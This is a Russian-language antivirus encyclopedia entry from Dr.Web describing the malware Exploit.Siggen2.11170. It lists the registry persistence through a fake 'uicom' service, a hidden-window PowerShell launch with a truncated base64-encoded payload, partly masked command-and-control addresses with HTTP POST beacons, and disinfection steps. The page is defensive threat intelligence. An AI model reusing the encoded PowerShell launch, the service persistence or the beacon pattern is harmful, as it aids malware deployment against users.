Поддержка
Круглосуточная поддержка

Позвоните

Бесплатно по России:
8-800-333-79-32

ЧаВо | Форум

Ваши запросы

  • Все: -
  • Незакрытые: -
  • Последний: -

Позвоните

Бесплатно по России:
8-800-333-79-32

Свяжитесь с нами Незакрытые запросы: 

Профиль

Профиль

Exploit.Siggen2.11170

Добавлен в вирусную базу Dr.Web: 2020-07-29

Описание добавлено:

Техническая информация

Для обеспечения автозапуска и распространения
Устанавливает следующие настройки сервисов
  • [<HKLM>\System\CurrentControlSet\Services\uicom] 'Start' = '00000002'
  • [<HKLM>\System\CurrentControlSet\Services\uicom] 'ImagePath' = '"%WINDIR%\SysWOW64\wzcdlg\uicom.exe"'
Создает следующие сервисы
  • 'uicom' "%WINDIR%\SysWOW64\wzcdlg\uicom.exe"
  • 'uicom' %WINDIR%\SysWOW64\wzcdlg\uicom.exe
Вредоносные функции
Запускает на исполнение (эксплоит)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABVAEYAQgBJAEkAbABpAGkAPQAnAEcASABBAE8ARQBsAHoAbwAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAGUAQwBVAGAAUgBpAGAAVABgAFkAUABSAG8AYABUAG8AQwBvAEwAIgAgAD...
Изменения в файловой системе
Создает следующие файлы
  • %HOMEPATH%\853.exe
Перемещает следующие файлы
  • %HOMEPATH%\853.exe в %WINDIR%\syswow64\wzcdlg\uicom.exe
Сетевая активность
Подключается к
  • '76.##.179.47':80
  • '31.#1.77.83':443
  • '74.##8.45.104':8080
  • '16#.#39.182.217':8080
  • '17#.#11.60.55':8080
  • '16#.#35.67.138':7080
  • '75.##9.38.211':80
  • '5.###.74.210':8080
  • '22#.#14.218.37':4143
  • '10#.#17.53.230':443
  • '12#.#5.106.173':443
  • '83.##0.223.58':443
  • '91.##1.88.52':7080
  • '16#.#54.38.103':80
  • '61.##.246.238':443
  • '18#.#12.199.126':443
  • '21#.#1.142.238':8080
  • '11#.#03.32.252':8080
  • '37.##9.21.175':8080
TCP
Запросы HTTP GET
  • http://bu####roperties.com/lyhvmiq/s_ia_4uaq/
Запросы HTTP POST
  • http://76.##.179.47/uNmamYP5hinGx0nJMl3/cSrcpCpf/
  • http://21#.##.142.238:8080/rVaulXc8ml4an/6Ph092Rwr/iYAjqBM8A/NK69CxgDl6kZ/NvJB9idtKmBTMd/FbJgy7Tpo/ via 21#.#1.142.238
  • http://18#.##2.199.126:443/rYmadTYT0DogPtKYj/ZX9DH6fH/eKPGU91KY5/Ooxel1TqIvhuOPq/K2bS6U0IXcmhIEmILXK/uHg3/ via 18#.#12.199.126
  • http://83.###.223.58:443/CimhG6neQ/E49iWKrC9pjFJo/RDjJa/Yaj1TTlfl/FvPnYnzzNWmK/rJtRXMnuH/ via 83.##0.223.58
  • http://12#.##.106.173:443/df4fvGkG9tb1ozy1OHa/bAGbR1XWX5Wu5/On2mQHD7tF/gGCWgJRdwAM0E/mmhgAdDKHjMsk/xIS1G6Sfmlp/ via 12#.#5.106.173
  • http://75.##9.38.211/6Je3VeDXjmyGt8/3ugj/GDBkq/
UDP
  • DNS ASK bu####roperties.com
Другое
Создает и запускает на исполнение
  • '%HOMEPATH%\853.exe'
  • '%WINDIR%\syswow64\wzcdlg\uicom.exe'
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABVAEYAQgBJAEkAbABpAGkAPQAnAEcASABBAE8ARQBsAHoAbwAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAGUAQwBVAGAAUgBpAGAAVABgAFkAUABSAG8AYABUAG8AQwBvAEwAIgAgAD...' (со скрытым окном)

Рекомендации по лечению

  1. В случае если операционная система способна загрузиться (в штатном режиме или режиме защиты от сбоев), скачайте лечащую утилиту Dr.Web CureIt! и выполните с ее помощью полную проверку вашего компьютера, а также используемых вами переносных носителей информации.
  2. Если загрузка операционной системы невозможна, измените настройки BIOS вашего компьютера, чтобы обеспечить возможность загрузки ПК с компакт-диска или USB-накопителя. Скачайте образ аварийного диска восстановления системы Dr.Web® LiveDisk или утилиту записи Dr.Web® LiveDisk на USB-накопитель, подготовьте соответствующий носитель. Загрузив компьютер с использованием данного носителя, выполните его полную проверку и лечение обнаруженных угроз.
Скачать Dr.Web

По серийному номеру

Выполните полную проверку системы с использованием Антивируса Dr.Web Light для macOS. Данный продукт можно загрузить с официального сайта Apple App Store.

На загруженной ОС выполните полную проверку всех дисковых разделов с использованием продукта Антивирус Dr.Web для Linux.

Скачать Dr.Web

По серийному номеру

  1. Если мобильное устройство функционирует в штатном режиме, загрузите и установите на него бесплатный антивирусный продукт Dr.Web для Android Light. Выполните полную проверку системы и используйте рекомендации по нейтрализации обнаруженных угроз.
  2. Если мобильное устройство заблокировано троянцем-вымогателем семейства Android.Locker (на экране отображается обвинение в нарушении закона, требование выплаты определенной денежной суммы или иное сообщение, мешающее нормальной работе с устройством), выполните следующие действия:
    • загрузите свой смартфон или планшет в безопасном режиме (в зависимости от версии операционной системы и особенностей конкретного мобильного устройства эта процедура может быть выполнена различными способами; обратитесь за уточнением к инструкции, поставляемой вместе с приобретенным аппаратом, или напрямую к его производителю);
    • после активации безопасного режима установите на зараженное устройство бесплатный антивирусный продукт Dr.Web для Android Light и произведите полную проверку системы, выполнив рекомендации по нейтрализации обнаруженных угроз;
    • выключите устройство и включите его в обычном режиме.

Подробнее о Dr.Web для Android

Демо бесплатно на 14 дней

Выдаётся при установке